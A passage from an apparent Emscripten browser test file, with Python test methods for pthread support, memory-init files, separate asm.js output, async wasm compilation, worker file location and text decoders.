self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + args)
test([])
test(['-O3'])
test(['-s', 'MODULARIZE_INSTANCE=1'])
# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD=1'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest(path_from_root('tests', 'pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=128MB', '-O3', '-s', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-std=c++11', '-s', 'USE_PTHREADS=1'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS=1'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
# Test that --separate-asm works with -s USE_PTHREADS=1.
@no_wasm_backend('asm.js')
@requires_threads
def test_pthread_separate_asm_pthreads(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'] + modularize)
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
if self.is_wasm_backend():
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
for args in [['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(path_from_root('tests', 'pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'TOTAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME=1'], also_asmjs=True)
# Test that STACK_BASE and STACK_MAX correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS', '-std=c++11'])
# Test that real `thread_local` works.
@no_fastcomp('thread_local is only supported on WASM backend')
@requires_threads
def test_pthread_tls(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-std=c++11'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@no_fastcomp('thread_local is only supported on WASM backend')
@requires_threads
def test_pthread_tls_main(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS', '-std=c++11'])
@no_fastcomp('WASM backend stack protection')
@requires_threads
def test_pthread_safe_stack(self):
self.btest(path_from_root('tests', 'core', 'test_safe_stack.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'DEFAULT_PTHREAD_STACK_SIZE=64KB', '--pre-js', path_from_root('tests', 'pthread', 'test_safe_stack.js')])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@no_fastcomp('LSan is only supported on WASM backend')
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@no_fastcomp('ASan is only supported on WASM backend')
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@no_fastcomp('ASan is only supported on WASM backend')
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.js')])
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'ASSERTIONS=1'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_test_file('page.html',
open(path_from_root('tests', 'browser', 'test_em_asm_blocking.html')).read())
create_test_file('wasm.cpp',
self.with_report_result(
open(path_from_root('tests', 'browser', 'test_em_asm_blocking.cpp')).read()))
self.compile_btest(['wasm.cpp', '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# test atomicrmw i64
@no_wasm_backend('uses an asm.js .ll file')
@requires_threads
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0'])
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'])
@no_wasm_backend('mem init file')
def test_meminit_pairs(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
@no_wasm_backend('mem init file')
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)] * 256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
assert len(d) > (1 << 27) # more than 32M memory initializer
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s WASM=0 --separate-asm as well.
@no_wasm_backend('asm.js')
def test_minimal_runtime_separate_asm(self):
for opts in [['-s', 'MINIMAL_RUNTIME=1']]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.html', '-s', 'WASM=0', '--separate-asm'] + opts)
self.run_browser('test.html', None, '/report_result?0')
@no_wasm_backend('asm.js')
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.html', '-s', 'WASM=0'] + opts)
self.run_browser('test.html', None, '/report_result?0')
print('run one')
create_test_file('one.html', '<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
print('run two')
run_process([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js'])
create_test_file('two.html', '''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
print('run hello world')
self.clear()
assert not os.path.exists('tests.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['-s', 'WASM=0', '--separate-asm'])
self.assertExists('test.asm.js')
os.unlink('test.asm.js')
print('see a fail')
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
@no_wasm_backend('emterpretify - bytecode in a file')
def test_emterpretify_file(self):
create_test_file('shell.html', '''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
self.assertExists('code.dat')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
self.assertExists('code.dat')
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
@no_wasm_backend('mem init file')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js'] + opts)
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(os.path.join(path_from_root('tests/manual_wasm_instantiate.cpp'))).read()))
self.compile_btest(['src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1'])
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_binaryen_worker(self):
self.do_test_worker(['-s', 'WASM=1'])
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=1', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
